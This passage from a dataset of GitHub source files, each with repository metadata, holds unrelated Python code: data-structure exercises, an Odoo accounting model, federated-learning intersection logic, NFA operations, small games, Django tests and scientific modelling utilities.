test_get_multiple_elem_in_slot(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n hash_table.set(1025, 'abc')\n hash_table.set(2049, 'lol')\n self.assertEqual('abc', hash_table.get(1025))\n\n def test_brackets(self):\n hash_table = HashTable()\n hash_table['You only'] = 'test once'\n self.assertEqual('test once', hash_table['You only'])\n\n","repo_name":"maciekgroch/maciek_learns_algorithms","sub_path":"data_structures/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40061124865","text":"from odoo import fields, models\n\n\nclass AccountAccount(models.Model):\n _inherit = \"account.account\"\n\n debit = fields.Float(string=\"Debit\", compute=\"_compute_account_balance\")\n credit = fields.Float(string=\"Credit\", compute=\"_compute_account_balance\")\n balance = fields.Float(string=\"Balance\", compute=\"_compute_account_balance\")\n\n def _compute_account_balance(self):\n for rec in self:\n sql = \"\"\"\n SELECT SUM(COALESCE(debit,0)) debit, SUM(COALESCE(credit,0)) credit,\n SUM(COALESCE(debit,0)-COALESCE(credit,0)) balance\n FROM account_move_line aml,account_move am\n WHERE aml.move_id=am.id\n AND account_id=%s\n AND am.state='posted'\n \"\"\"\n self._cr.execute(sql, (rec.id,))\n r = self._cr.fetchone()\n rec.debit = r[0]\n rec.credit = r[1]\n rec.balance = r[2]\n","repo_name":"kwaku-pistis/github_actions","sub_path":"account_account_balance/models/account_account.py","file_name":"account_account.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18588041263","text":"class LinkedList:\n head = None\n\n def __init__(self, iterable=None):\n if iterable:\n for i in iterable:\n self.append(Node(i))\n\n def append(self, node):\n if self.head is None:\n self.head = node\n else:\n current = self.head\n while current.next:\n current = current.next\n current.next = node\n\n def prepend(self, node):\n if not self.head:\n self.head = node\n else:\n node.next = self.head\n self.head = node\n\n def print(self):\n current = self.head\n while current:\n print(current.value)\n current = current.next\n\n def to_list(self):\n as_list = list()\n current = self.head\n while current:\n as_list.append(current.value)\n current = current.next\n\n return as_list\n\n\nclass Node:\n value = None\n next = None\n\n def __init__(self, value):\n self.value = value\n\n\nif __name__ == '__main__':\n test1 = [1, 2, 3]\n\n ll = LinkedList(test1)\n\n ll.print()\n\n print(ll.to_list())\n\n\n prepend_test = [1, 2, 3, 4]\n\n ll = LinkedList()\n for i in prepend_test:\n ll.prepend(Node(i))\n\n assert ll.to_list() == list(reversed(prepend_test))\n","repo_name":"maddencs/cracking_code","sub_path":"section2/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22720857671","text":"import unittest\nimport sys\nfrom webullsdkcore.client import ApiClient\nfrom webullsdkcore.request import ApiRequest\n\nOPENAPI_ENDPOINT = \"\"\n\n\nclass TestApiClient(unittest.TestCase):\n\n def test_api(self):\n client = ApiClient(app_key=\"\", app_secret=\"\")\n client.set_stream_logger(stream=sys.stderr)\n request = ApiRequest(\"/market-data/streaming/token\", version=\"v1\")\n request.set_endpoint(OPENAPI_ENDPOINT)\n self.assertIsNone(request.get_headers().get('Accept-Encoding'))\n client.get_response(request)\n self.assertEqual(request.get_headers()['Accept-Encoding'], 'gzip')\n","repo_name":"webull-inc/openapi-python-sdk","sub_path":"webull-python-sdk-demos/tests/core/api/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"3837358910","text":"#coding=utf-8\n\"\"\"\n@Author: Freshield\n@Contact: yangyufresh@163.com\n@File: b2_smooth.py\n@Time: 2019-12-27 09:38\n@Last_update: 2019-12-27 09:38\n@Desc: None\n@==============================================@\n@ _____ _ _ _ _ @\n@ | __|___ ___ ___| |_|_|___| |_| | @\n@ | __| _| -_|_ -| | | -_| | . | @\n@ |__| |_| |___|___|_|_|_|___|_|___| @\n@ Freshield @\n@==============================================@\n\"\"\"\nimport math\nimport numpy as np\n\n\ndef smooth(img_data, sigma=1.4, return_int=True):\n \"\"\"\n 生成一个(2k+1)x(2k+1)的高斯滤波器\n H[i, j] = (1/(2*pi*sigma**2))*exp((-1/(2*sigma**2)*((i-k-1)**2+(j-k-1)**2)\n \"\"\"\n gau_sum = 0\n gaussian = np.zeros((5, 5))\n for i in range(5):\n for j in range(5):\n left = 1 / (2 * math.pi * sigma**2)\n right = math.exp((-1/(2*sigma**2)) * ((i-3-1)**2+(j-3-1)**2))\n gaussian[i, j] = left * right\n gau_sum += gaussian[i, j]\n\n gaussian = gaussian / gau_sum\n\n # 滤波\n W, H = img_data.shape\n new_gray = np.zeros((W-5, H-5))\n\n for i in range(W-5):\n for j in range(H-5):\n new_gray[i, j] = np.sum(img_data[i:i+5, j:j+5] * gaussian)\n\n if return_int:\n new_gray = new_gray.astype(np.uint8)\n\n return new_gray\n\n\nif __name__ == '__main__':\n import cv2\n from b0_get_img_data import get_img_data\n from b1_gray import gray\n\n img_path = 'data/test.jpg'\n img_data = get_img_data(img_path)\n img_data = gray(img_data)\n img_data = smooth(img_data)\n\n img_data = img_data.astype(np.uint8)\n cv2.imshow('test', img_data)\n cv2.waitKey()","repo_name":"Freshield/Personal_Interest","sub_path":"a16_learn_canny/b2_smooth.py","file_name":"b2_smooth.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26901453875","text":"from federatedml.statistic.intersect.ecdh_intersect.ecdh_intersect_base import EcdhIntersect\nfrom federatedml.util import consts, LOGGER\n\n\nclass EcdhIntersectionGuest(EcdhIntersect):\n def __init__(self):\n super().__init__()\n self.role = consts.GUEST\n self.id_local_first = None\n self.id_remote_second = None\n self.id_local_second = None\n self.host_count = None\n\n def _exchange_id(self, id_cipher, replace_val=True):\n if replace_val:\n id_cipher = id_cipher.mapValues(lambda v: None)\n self.transfer_variable.id_ciphertext_exchange_g2h.remote(id_cipher,\n role=consts.HOST,\n idx=-1)\n LOGGER.info(f\"sent id 1st ciphertext to all host\")\n\n id_list_remote = self.transfer_variable.id_ciphertext_exchange_h2g.get(idx=-1)\n LOGGER.info(\"got id ciphertext from all host\")\n return id_list_remote\n\n def _sync_doubly_encrypted_id(self, id=None):\n id_guest = self.transfer_variable.doubly_encrypted_id.get(idx=-1)\n LOGGER.info(\"got doubly encrypted id list from host\")\n return id_guest\n\n \"\"\"\n def send_intersect_ids(self, intersect_ids):\n remote_intersect_id = intersect_ids.map(lambda k, v: (v, None))\n self.transfer_variable.intersect_ids.remote(remote_intersect_id,\n role=consts.HOST,\n idx=0)\n LOGGER.info(f\"Remote intersect ids to Host!\")\n \"\"\"\n\n def send_intersect_ids(self, intersect_ids):\n for i, host_party_id in enumerate(self.host_party_id_list):\n remote_intersect_id = intersect_ids.map(lambda k, v: (v[i], None))\n self.transfer_variable.intersect_ids.remote(remote_intersect_id,\n role=consts.HOST,\n idx=i)\n LOGGER.info(f\"Remote intersect ids to {i}th Host {host_party_id}!\")\n\n def get_intersect_doubly_encrypted_id(self, data_instances, keep_key=True):\n self.init_curve()\n LOGGER.info(f\"curve instance obtained\")\n\n # 1st ID encrypt: # (Eg, -1)\n self.id_local_first = self._encrypt_id(data_instances,\n self.curve_instance,\n reserve_original_key=keep_key,\n hash_operator=self.hash_operator,\n salt=self.salt)\n LOGGER.info(\"encrypted guest id for the 1st time\")\n id_list_remote_first = self._exchange_id(self.id_local_first, keep_key)\n\n # 2nd ID encrypt & receive doubly encrypted ID list: # (EEh, Eh)\n self.id_list_remote_second = [self._sign_id(id_remote_first,\n self.curve_instance,\n reserve_original_key=keep_key)\n for id_remote_first in id_list_remote_first]\n LOGGER.info(\"encrypted remote id for the 2nd time\")\n\n # receive doubly encrypted ID list from all host:\n self.id_list_local_second = self._sync_doubly_encrypted_id() # get (EEg, Eg)\n\n # find intersection per host: (EEi, [Eg, Eh])\n id_list_intersect_cipher_cipher = [self.extract_intersect_ids(remote_cipher,\n local_cipher,\n keep_both=keep_key)\n for remote_cipher, local_cipher in zip(self.id_list_remote_second,\n self.id_list_local_second)]\n LOGGER.info(\"encrypted intersection ids found\")\n\n return id_list_intersect_cipher_cipher\n\n def decrypt_intersect_doubly_encrypted_id(self, id_intersect_cipher_cipher):\n # EEi -> (Eg, Eh)\n id_list_intersect_cipher = [ids.map(lambda k, v: (v[1], [v[0]])) for ids in id_intersect_cipher_cipher]\n intersect_ids = self.get_common_intersection(id_list_intersect_cipher, keep_encrypt_ids=True)\n LOGGER.info(f\"intersection found\")\n\n if self.sync_intersect_ids:\n self.send_intersect_ids(intersect_ids)\n else:\n LOGGER.info(\"Skip sync intersect ids with Host(s).\")\n intersect_ids = intersect_ids.join(self.id_local_first, lambda cipher, raw: raw)\n intersect_ids = intersect_ids.map(lambda k, v: (v, None))\n return intersect_ids\n\n def get_intersect_key(self, party_id):\n intersect_key = {\"curve_key\": self.curve_instance.get_curve_key().decode(\"latin1\")}\n return intersect_key\n\n def load_intersect_key(self, cache_meta):\n host_party = self.host_party_id_list[0]\n intersect_key = cache_meta[str(host_party)][\"intersect_key\"]\n for host_party in self.host_party_id_list:\n cur_intersect_key = cache_meta[str(host_party)][\"intersect_key\"]\n if cur_intersect_key != cur_intersect_key:\n raise ValueError(f\"Not all intersect keys from cache match, please check.\")\n\n curve_key = intersect_key[\"curve_key\"].encode(\"latin1\")\n self.init_curve(curve_key)\n\n def generate_cache(self, data_instances):\n self.init_curve()\n LOGGER.info(f\"curve instance obtained\")\n\n cache_id_list = self.cache_transfer_variable.get(idx=-1)\n LOGGER.info(f\"got cache_id from all host\")\n\n id_list_remote_first = self.transfer_variable.id_ciphertext_exchange_h2g.get(idx=-1)\n LOGGER.info(\"Get id ciphertext list from all host\")\n\n # 2nd ID encrypt & receive doubly encrypted ID list: # (EEh, Eh)\n id_remote_second = [self._sign_id(id_remote_first,\n self.curve_instance,\n reserve_original_key=True)\n for id_remote_first in id_list_remote_first]\n LOGGER.info(\"encrypted remote id for the 2nd time\")\n\n cache_data, cache_meta = {}, {}\n intersect_meta = self.get_intersect_method_meta()\n for i, party_id in enumerate(self.host_party_id_list):\n meta = {\"cache_id\": cache_id_list[i],\n \"intersect_meta\": intersect_meta,\n \"intersect_key\": self.get_intersect_key(party_id)}\n cache_meta[party_id] = meta\n cache_data[party_id] = id_remote_second[i]\n\n return cache_data, cache_meta\n\n def get_intersect_doubly_encrypted_id_from_cache(self, data_instances, cache_data):\n self.id_local_first = self._encrypt_id(data_instances,\n self.curve_instance,\n reserve_original_key=True,\n hash_operator=self.hash_operator,\n salt=self.salt)\n LOGGER.info(\"encrypted guest id for the 1st time\")\n\n id_only = self.id_local_first.mapValues(lambda v: None)\n self.transfer_variable.id_ciphertext_exchange_g2h.remote(id_only,\n role=consts.HOST,\n idx=-1)\n LOGGER.info(f\"sent id 1st ciphertext to host\")\n\n # receive doubly encrypted ID from all hosts:\n self.id_list_local_second = self._sync_doubly_encrypted_id() # get (EEg, Eg)\n self.host_count = len(self.id_list_local_second)\n\n # find intersection: (EEi, [Eg, Eh])\n cache_host_list = self.extract_cache_list(cache_data, self.host_party_id_list)\n id_list_intersect_cipher_cipher = [self.extract_intersect_ids(cache_host_list[i],\n self.id_list_local_second[i],\n keep_both=True)\n for i in range(self.host_count)]\n LOGGER.info(\"encrypted intersection ids found\")\n self.id_remote_second = cache_host_list\n\n return id_list_intersect_cipher_cipher\n\n def run_cardinality(self, data_instances):\n LOGGER.info(f\"run cardinality_only with ECDH\")\n # EEg, Eg\n id_list_intersect_cipher_cipher = self.get_intersect_doubly_encrypted_id(data_instances,\n keep_key=False)\n # Eg\n id_intersect_cipher_cipher = self.filter_intersect_ids(id_list_intersect_cipher_cipher)\n self.intersect_num = id_intersect_cipher_cipher.count()\n if self.sync_cardinality:\n self.transfer_variable.cardinality.remote(self.intersect_num, role=consts.HOST, idx=-1)\n LOGGER.info(\"Sent intersect cardinality to host.\")\n else:\n LOGGER.info(\"Skip sync intersect cardinality with host\")\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/statistic/intersect/ecdh_intersect/ecdh_intersect_guest.py","file_name":"ecdh_intersect_guest.py","file_ext":"py","file_size_in_byte":9149,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"39445873554","text":"# Basic Calculator #\n# =============== #\n\n# ----- Importing Libraries ----- #\n\nimport re\n\n# ----- Welcome Message ----- #\n\nprint(\"\\n\", \"The Magical Calculator\", \"\\n\", \"======================\\n\")\nprint(\" Type 'quit' to exit.... \\n\\n\")\n\n# ------ Start of Program ----- #\n\nprevious = 0\nrun = True\n\n\ndef PerformMath():\n global run\n global previous\n equation = \"\"\n if previous == 0:\n equation = input(\" Enter Your Equation: \")\n else:\n equation = input(str(previous))\n if equation == \"quit\":\n print(\" Have a good day :)\")\n run = False\n else:\n equation = re.sub(\"[a-zA-Z,.%()\" \"]\", \"\", equation)\n\n if previous == 0:\n previous = eval(equation)\n else:\n previous = eval(str(previous) + equation)\n print(\" Result: \", previous)\n\n\nwhile run:\n PerformMath()\n\n\n# ------ End of Program ----- #\n","repo_name":"quantumudit/Python-Projects","sub_path":"04_Basic_Calculator/basic_calculator.py","file_name":"basic_calculator.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12159740089","text":"from fastapi import Depends\nfrom dependency_injector.wiring import Provide\nfrom datetime import datetime, timedelta\nimport json\nfrom api.containers import Container\nfrom api.services import Service\nfrom api.config import DATETIME_FORMAT\nfrom api.utils.errors import ErrorMessage\nfrom api.utils.messages import GetMessage, messages\nfrom api.utils.parce import GetPage\nfrom api.utils.time import last_updated_timedelta_to_text\n\n\nasync def GetChacheRequest(key, function=GetPage, service: Service = Depends(Provide[Container.service]), post_processing_function=None, chache_hours=5, **kwargs):\n cache_data = await service.GetCache(key)\n async def items_result(items):\n if post_processing_function:\n return await post_processing_function(items)\n return items\n if cache_data:\n items_cache = json.loads(cache_data)\n caching_date = datetime.strptime(\n items_cache.get('date'), DATETIME_FORMAT)\n now = datetime.now()\n last_updated = now - caching_date\n if last_updated > timedelta(hours=chache_hours):\n items = await function(key=key, **kwargs)\n if isinstance(items, int):\n del items_cache['date']\n items_cache['last_updated'] = last_updated_timedelta_to_text(\n last_updated)\n items_cache['message'] = f\"{GetMessage(items)} {messages.get('last')}\"\n return await items_result(items_cache)\n else:\n del items_cache['date']\n items_cache['last_updated'] = last_updated_timedelta_to_text(\n last_updated)\n return await items_result(items_cache)\n else:\n items = await function(key=key, **kwargs)\n if isinstance(items, int):\n return ErrorMessage(message=GetMessage(items), status_code=items)\n items['last_updated'] = 'сейчас'\n return await items_result(items)\n","repo_name":"Semolik/ASUtimetable","sub_path":"api/utils/chache.py","file_name":"chache.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15582918460","text":"from NanoParticleTools.inputs.nanoparticle import NanoParticleConstraint, SphericalConstraint\nfrom NanoParticleTools.machine_learning.data.processors import DataProcessor\n\nfrom typing import List, Tuple, Optional\nfrom itertools import combinations_with_replacement\nfrom functools import lru_cache\nimport torch\nfrom torch_geometric.data.data import Data\nfrom monty.json import MontyDecoder\n\n\nclass GraphFeatureProcessor(DataProcessor):\n\n def __init__(self,\n log_volume: Optional[bool] = False,\n **kwargs):\n \"\"\"\n :param possible_elements:\n :param log_volume: Whether to apply a log10 to the volume to reduce orders of magnitude.\n defaults to False\n \"\"\"\n # yapf: disable\n super().__init__(fields=[\n 'formula_by_constraint', 'dopant_concentration', 'input'], **kwargs)\n # yapf: enable\n\n self.log_volume = log_volume\n\n @property\n @lru_cache\n def edge_type_map(self):\n edge_type_map = {}\n for i, (el1, el2) in enumerate(\n list(combinations_with_replacement(self.possible_elements, 2))):\n try:\n edge_type_map[el1][el2] = i\n except KeyError:\n edge_type_map[el1] = {el2: i}\n\n try:\n edge_type_map[el2][el1] = i\n except KeyError:\n edge_type_map[el2] = {el1: i}\n return edge_type_map\n\n def get_node_features(self, constraints,\n dopant_specifications) -> torch.Tensor:\n \"\"\"\n Here, the node feature is simply the id of the element pair\n and the distance between the layers\n \"\"\"\n\n node_features = []\n\n for i, (constraint_i, x_i, el_i,\n _) in enumerate(dopant_specifications):\n r_inner_i, r_outer_i = self.get_radii(constraint_i, constraints)\n r_mean_i = (r_outer_i + r_inner_i) / 2\n v_i = self.get_volume(r_outer_i) - self.get_volume(r_inner_i)\n\n for j, (constraint_j, x_j, el_j,\n _) in enumerate(dopant_specifications):\n r_inner_j, r_outer_j = self.get_radii(constraint_j,\n constraints)\n r_mean_j = (r_outer_j + r_inner_j) / 2\n v_j = self.get_volume(r_outer_j) - self.get_volume(r_inner_j)\n d_mean = r_mean_j - r_mean_i\n\n node_features.append([\n self.edge_type_map[el_i][el_j], d_mean, x_i, x_j, v_i, v_j\n ])\n\n node_features = torch.tensor(node_features, dtype=torch.float)\n\n if self.log_volume:\n node_features[:, -2:] = torch.log10(node_features[:, -2:])\n else:\n node_features[:, -2:] = node_features[:, -2:] / 1e6\n\n return {'x': node_features, 'num_nodes': node_features.shape[0]}\n\n def get_edge_features(self, n_nodes: int) -> torch.Tensor:\n\n # Build all the edge connections. Treat this as fully connected\n\n x, y = torch.meshgrid(torch.arange(n_nodes),\n torch.arange(n_nodes),\n indexing='xy')\n edge_index = torch.vstack(\n [x.reshape(n_nodes**2),\n y.reshape(n_nodes**2)])\n\n return {'edge_index': edge_index}\n\n def get_data_graph(self, constraints: List[NanoParticleConstraint],\n dopant_specifications: List[Tuple[int, float, str,\n str]]):\n\n output_dict = self.get_node_features(constraints,\n dopant_specifications)\n output_dict.update(self.get_edge_features(output_dict['x'].shape[0]))\n\n return output_dict\n\n def process_doc(self, doc: dict) -> dict:\n constraints = doc['input']['constraints']\n dopant_specifications = doc['input']['dopant_specifications']\n\n constraints = MontyDecoder().process_decoded(constraints)\n\n return self.get_data_graph(constraints, dopant_specifications)\n\n @property\n def is_graph(self):\n return True\n\n @property\n def data_cls(self):\n return Data\n","repo_name":"BlauGroup/NanoParticleTools","sub_path":"src/NanoParticleTools/machine_learning/models/layer_pair_GAT_model/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"34768891543","text":"import nfa\n\ndef singleton(w):\n \"\"\"Returns a NFA recognizing the language {w}.\n\n (It's not a regular operation so it technically doesn't belong in\n this module.)\n \"\"\"\n \n m = nfa.NFA()\n m.set_start(0)\n for i in range(len(w)):\n m.add_transition(nfa.Transition(i, w[i], i+1))\n m.add_accept(len(w))\n return m\n\ndef copy_into(m1, m2, offset=0):\n \"\"\"Helper function that copies states and transitions from m1 into m2,\n renumbering the states and possibly adding an offset. Does *not*\n change start or accept states.\n \"\"\"\n states = {}\n for qi, qname in enumerate(m1.states):\n m2.add_state(qi+offset)\n states[qname] = qi+offset\n for q in m1.transitions:\n for a in m1.transitions[q]:\n for t in m1.transitions[q][a]:\n m2.add_transition(nfa.Transition(states[t.q], t.a, states[t.r], t.group))\n return states[m1.start], {states[q] for q in m1.accept}\n \ndef union(m1, m2):\n \"\"\"Returns a NFA that recognizes L(m1) \\cup L(m2).\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m, offset=1)\n start2, accept2 = copy_into(m2, m, offset=1+len(m1.states))\n m.set_start(0)\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start1))\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start2))\n for q in accept1 | accept2:\n m.add_accept(q)\n return m\n\ndef concat(m1, m2):\n \"\"\"Returns a NFA that recognizes L(m1) L(m2).\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m)\n start2, accept2 = copy_into(m2, m, offset=len(m1.states))\n m.set_start(start1)\n for q in accept1:\n m.add_transition(nfa.Transition(q, nfa.EPSILON, start2))\n for q in accept2:\n m.add_accept(q)\n return m\n\ndef star(m1):\n \"\"\"Returns a NFA that recognizes L(m1)*.\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m, offset=1)\n m.set_start(0)\n m.add_accept(0)\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start1))\n for q in accept1:\n m.add_accept(q)\n m.add_transition(nfa.Transition(q, nfa.EPSILON, start1))\n return m\n\n# new group function that pads a group nfa with transitions specially marked with the number passed in\ndef group(m1, num):\n \"\"\"Returns a NFA that recognizes (L(m1)).\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m, offset=1)\n m.set_start(0)\n a = len(m.states)\n m.add_accept(a)\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start1, num))\n for q in accept1:\n m.add_transition(nfa.Transition(q, nfa.EPSILON, a, num))\n return m","repo_name":"walkerbagley/coursework","sub_path":"CSE 30151 - Theory of Computing/cp3/regular.py","file_name":"regular.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35443586644","text":"size = int(input())\nfield = [[int(x) if x.isdigit() else x for x in input().split()] for rows in range(size)]\nplayer_position = []\nwalls_positions = []\nPLAYER = 'P'\nWALL = 'X'\npath = []\n\nfor row in range(size):\n for col in range(size):\n el = field[row][col]\n if el == PLAYER:\n player_position.append([row, col])\n path.append([row, col])\n field[row][col] = 0\n elif el == WALL:\n walls_positions.append([row, col])\n# print(field)\ndirections_dict = {\n 'up': (-1, 0), # up\n 'down': (1, 0), # down\n 'right': (0, 1), # right\n 'left': (0, -1), # left\n}\n\n# print(player_position)\n# print(walls_positions)\ncoins = 0\nhits_wall = False\n\nwhile not hits_wall and coins <= 100:\n command = input()\n\n if command not in directions_dict.keys():\n continue\n\n row = player_position[0][0]\n col = player_position[0][1]\n x = directions_dict[command][0]\n y = directions_dict[command][1]\n r = row + x\n c = col + y\n if r < 0:\n r = size - 1\n if r == size:\n r = 0\n if c < 0:\n c = size - 1\n if c == size:\n c = 0\n curr_pos = field[r][c]\n if curr_pos == WALL:\n hits_wall = True\n path.append([r, c])\n break\n elif curr_pos > 0:\n coins += curr_pos\n field[r][c] = 0\n\n path.append([r, c])\n else:\n path.append([r, c])\n player_position[0] = [r, c]\n\n# print(coins)\n# print(*path)\nif coins > 99:\n print(f\"You won! You've collected {coins} coins.\")\nelse:\n print(f\"Game over! You've collected {int(coins * 0.5)} coins.\")\n\nprint(\"Your path:\")\nprint(*path, sep=\"\\n\")","repo_name":"maon0002/Python-Advanced-January-2023","sub_path":"past_exams/problem_2__collecting_coins.py","file_name":"problem_2__collecting_coins.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38931257728","text":"import pickle\nimport os\n\ndef print_title_bar(_games):\n print(\"**********************************************\")\n print(\"*** Games list - there are currently %d games in the list ***\" % len(_games) )\n print(\"**********************************************\")\n\ndef load_games_list(_games):\n if len(_games) > 0:\n for game in _games:\n print(\"The following game was loaded from the file: %s\" % game)\n else:\n print(\"There was no list of games to load.\")\n\ndef add_game(_games):\n new_game = \"\"\n in_list = False\n new_game = input(\"Enter a new game to add to the list: \")\n for game in _games:\n if new_game == game:\n print(\"That game is already in your list.\")\n in_list = True\n if in_list == False:\n _games.append(new_game)\n return _games\n\ndef quit():\n try:\n file_object = open(\"Exercise_6.3.pydata\", \"wb\")\n pickle.dump(games, file_object)\n file_object.close()\n\n print(\"I will remember the following games: \")\n for game in games:\n print(game)\n except Exception as e:\n print(e)\n print(\"I couldn't figure out how to store the games, sorry.\")\n os.system(\"pause\")\n\ndef run_program(_games):\n choice = \"\"\n while choice != \"3\":\n print_title_bar(_games)\n choice = input(\"[1] See current list of games. \\n[2] Add a game to your list. \\n[3] Quit the application. \")\n if choice == \"1\":\n load_games_list(_games)\n os.system(\"pause\")\n os.system(\"cls\")\n elif choice == \"2\":\n games = add_game(_games)\n os.system(\"pause\")\n os.system(\"cls\")\n elif choice == \"3\":\n quit()\n else:\n print(\"Sorry, that is not an accepted input. Please try again.\")\n os.system(\"pause\")\n\ntry:\n file_object = open(\"Exercise_6.3.pydata\", \"rb\")\n games = pickle.load(file_object)\n file_object.close()\nexcept:\n games = []\n\nrun_program(games)\n","repo_name":"EmissaryEntertainment/3D-Scripting","sub_path":"Week_6/McSpadden_Exercise_6.3.py","file_name":"McSpadden_Exercise_6.3.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41042065645","text":"from django.utils import unittest\nfrom djangovoice.models import *\n\n\nclass StatusTestCase(models.Model):\n def setUp(self):\n self.in_progress = Status.objects.create(\n title='In progress', slug='in_progress', default=False)\n self.need_to_test = Status.objects.create(\n title='Need to test', slug='need_to_test', default=True)\n\n def testSpeaking(self):\n self.assertEqual(self.in_progress.status, 'open')\n self.assertEqual(self.need_to_test.default, True)\n\n\nclass TypeTestCase(unittest.TestCase):\n def setUp(self):\n self.bug = Type.objects.create(title='Bug', slug='bug')\n self.betterment = Type.objects.create(title='Betterment',\n slug='betterment')\n\n def testSpeaking(self):\n self.assertEqual(self.bug.slug, 'bug')\n self.assertEqual(self.betterment.title, 'Betterment')\n\n\nclass FeedbackTestCase(unittest.TestCase):\n def setUp(self):\n feedback_type = Type.objects.create(title='Bug', slug='bug')\n feedback_user = User.objects.create_user(\n username='djangovoice', email='django@voice.com')\n self.login_form_does_not_work = Feedback.objects.create(\n type=feedback_type,\n title='Login form does not work.',\n description='What a fucking test...',\n anonymous=False,\n private=True,\n user=feedback_user)\n\n def testSpeaking(self):\n default_status = Status.objects.get(default=True)\n self.assertEqual(self.login_form_does_not_work.status, default_status)\n","repo_name":"rossp/django-voice","sub_path":"djangovoice/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33189807807","text":"import math\nimport numpy as np\n\nfrom chemtools.conceptual.base import BaseGlobalTool\nfrom chemtools.conceptual.utils import check_dict_values, check_number_electrons\nfrom chemtools.utils.utils import doc_inherit\n\n\n__all__ = ['RationalGlobalTool']\n\n\nclass RationalGlobalTool(BaseGlobalTool):\n r\"\"\"\n Class of global conceptual DFT reactivity descriptors based on the rational energy model.\n\n The energy is approximated as a 3-parameter rational function of the number of electrons,\n\n .. math:: E(N) = \\frac{a_0 + a_1 N}{1 + b_1 N}\n\n Given :math:`E(N_0 - 1)`, :math:`E(N_0)` and :math:`E(N_0 + 1)` values, the unknown parameters\n of the energy model are obtained by interpolation.\n\n The :math:`n^{\\text{th}}`-order derivatives of the rational energy model with respect to\n the number of electrons at fixed external potential is given by:\n\n .. math::\n \\left(\\frac{\\partial^n E}{\\partial N^n} \\right)_{v(\\mathbf{r})} =\n \\frac{b_1^{n - 1} (a_1 - a_0 b_1) n!}{(1 + b_1 N)^{2n}}\n \"\"\"\n\n def __init__(self, dict_energy):\n r\"\"\"Initialize rational energy model to compute global reactivity descriptors.\n\n Parameters\n ----------\n dict_energy : dict\n Dictionary of number of electrons (keys) and corresponding energy (values).\n This model expects three energy values corresponding to three consecutive number of\n electrons differing by one, i.e. :math:`\\{(N_0 - 1): E(N_0 - 1), N_0: E(N_0),\n (N_0 + 1): E(N_0 + 1)\\}`. The :math:`N_0` value is considered as the reference number\n of electrons.\n \"\"\"\n # check number of electrons & energy values\n n_ref, energy_m, energy_0, energy_p = check_dict_values(dict_energy)\n # check energy values\n if not energy_m > energy_0 >= energy_p:\n energies = [energy_m, energy_0, energy_p]\n raise ValueError(\"For rational model, the energy values for consecutive number of \"\n \"electrons should be monotonic! E={0}\".format(energies))\n # calculate parameters a0, a1 and b1 of rational energy model\n param_b1 = - (energy_p - 2 * energy_0 + energy_m)\n param_b1 /= ((n_ref + 1) * energy_p - 2 * n_ref * energy_0 + (n_ref - 1) * energy_m)\n param_a1 = (1 + param_b1 * n_ref) * (energy_p - energy_0) + (param_b1 * energy_p)\n param_a0 = - param_a1 * n_ref + energy_0 * (1 + param_b1 * n_ref)\n self._params = [param_a0, param_a1, param_b1]\n # calculate N_max\n n_max = float('inf')\n super(RationalGlobalTool, self).__init__(n_ref, n_max)\n self.dict_energy = dict_energy\n\n @property\n def params(self):\n \"\"\"Parameter :math:`a_0`, :math:`a_1` and :math:`b_1` of energy model.\"\"\"\n return self._params\n\n @doc_inherit(BaseGlobalTool)\n def energy(self, n_elec):\n # check n_elec argument\n check_number_electrons(n_elec, self._n0 - 1, self._n0 + 1)\n # evaluate energy\n if np.isinf(n_elec):\n # limit of E(N) as N goes to infinity equals a1/b1\n value = self._params[1] / self._params[2]\n else:\n value = (self._params[0] + self._params[1] * n_elec) / (1 + self._params[2] * n_elec)\n return value\n\n @doc_inherit(BaseGlobalTool)\n def energy_derivative(self, n_elec, order=1):\n # check n_elec argument\n check_number_electrons(n_elec, self._n0 - 1, self._n0 + 1)\n # check order\n if not (isinstance(order, int) and order > 0):\n raise ValueError(\"Argument order should be an integer greater than or equal to 1.\")\n # evaluate derivative\n if np.isinf(n_elec):\n # limit of E(N) derivatives as N goes to infinity equals zero\n deriv = 0.0\n else:\n deriv = (-self._params[2])**(order - 1)\n deriv *= (self._params[1] - self._params[0] * 